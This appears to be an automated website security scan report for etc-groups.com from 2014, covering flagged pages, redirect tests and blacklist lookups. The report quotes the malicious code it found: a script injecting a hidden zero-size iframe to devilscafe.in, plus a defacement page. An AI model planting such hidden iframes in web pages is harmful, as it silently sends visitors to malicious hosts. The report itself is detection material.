Scanned pages/files
Request | Server response | Status |
http://etc-groups.com/ | 200 OK Content-Length: 5322 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!-- document.write(unescape("<iframe frameborder="0" height="0" src="http: width="0"></iframe> <a href="http://www.devilscafe.in" target="_blank"><img src="" />")); //--> Antivirus reports:
Hidden iFrame found. The same iFrame was found in 13 websites. size: 0x0 src: http://www.devilscafe.in <iframe frameborder="0" height="0" src="http://www.devilscafe.in"
width="0"> Deface/Content modification. The following signature was found: Hacked By MEHR@N BBC ( Best Boy of City ) <html><head><meta http-equiv="content-type" content="text/html; charset=windows-1252"><title>Hacked By MEHR@N BBC ( Best Boy of City )</title>
</head><body bgcolor="black"><p></p><style>BODY {PADDING-RIGHT: 5px; PADDING-LEFT: 5px; SCROLLBAR-FACE-COLOR: #000000; BACKGROUND: #000000; PADDING-BOTTOM: 5px; MARGIN: 0px; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #00c000; SCROLLBAR-3DLIGHT-COLOR: #00c000; ...[5964 bytes skipped]... | ||
http://etc-groups.com/Hacked%20By%20Iran%20Security%20Team_files/ga.js | 404 Not Found Content-Length: 518 Content-Type: text/html | clean |
http://etc-groups.com/test404page.js | 404 Not Found Content-Length: 484 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: etc-groups.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 04 Apr 2014 22:45:27 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 5322
Content-Type: text/html
X-Powered-By: PHP/5.2.17
...5322 bytes of data.
GET / HTTP/1.1
Host: etc-groups.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 04 Apr 2014 22:45:27 GMT
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 5322
Content-Type: text/html
X-Powered-By: PHP/5.2.17
...5322 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: etc-groups.com
Referer: http://www.google.com/search?q=etc-groups.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: etc-groups.com
Referer: http://www.google.com/search?q=etc-groups.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=etc-groups.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://etc-groups.com/
Result: etc-groups.com is not infected or malware details are not published yet.
Result: etc-groups.com is not infected or malware details are not published yet.